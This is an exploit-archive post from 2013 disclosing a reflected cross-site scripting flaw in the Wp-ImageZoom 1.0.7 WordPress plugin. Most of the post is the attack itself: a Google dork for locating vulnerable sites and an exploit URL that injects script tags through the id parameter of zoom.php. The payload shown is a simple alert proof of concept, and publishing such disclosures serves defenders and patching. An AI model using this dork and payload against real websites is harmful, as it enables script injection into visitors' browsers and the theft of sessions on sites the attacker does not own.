facebook facebook twitter rss

Wordpress Plugins - Wp-ImageZoom 1.0.7 Cross Site Scripting Vulnerability

Author: AtT4CKxT3rR0r1ST , Published: 24-05-2013
Wordpress Plugins - Wp-ImageZoom 1.0.7 Cross Site Scripting Vulnerability
==========================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Script : http://wordpress.org/extend/plugins/wp-imagezoom/
.:. Version : 1.0.7
.:. Dork : inurl:"/wp-content/plugins/wp-imagezoom/zoom.php"
####################################################################
===[ Exploit ]===


Cross-Site Scripting :

site.com/wp-content/plugins/wp-imagezoom/zoom.php?id=Xss Code


site.com/wp-content/plugins/wp-imagezoom/zoom.php?id=</script><script>alert(/AXT/);</script>



####################################################################

Like us on Facebook :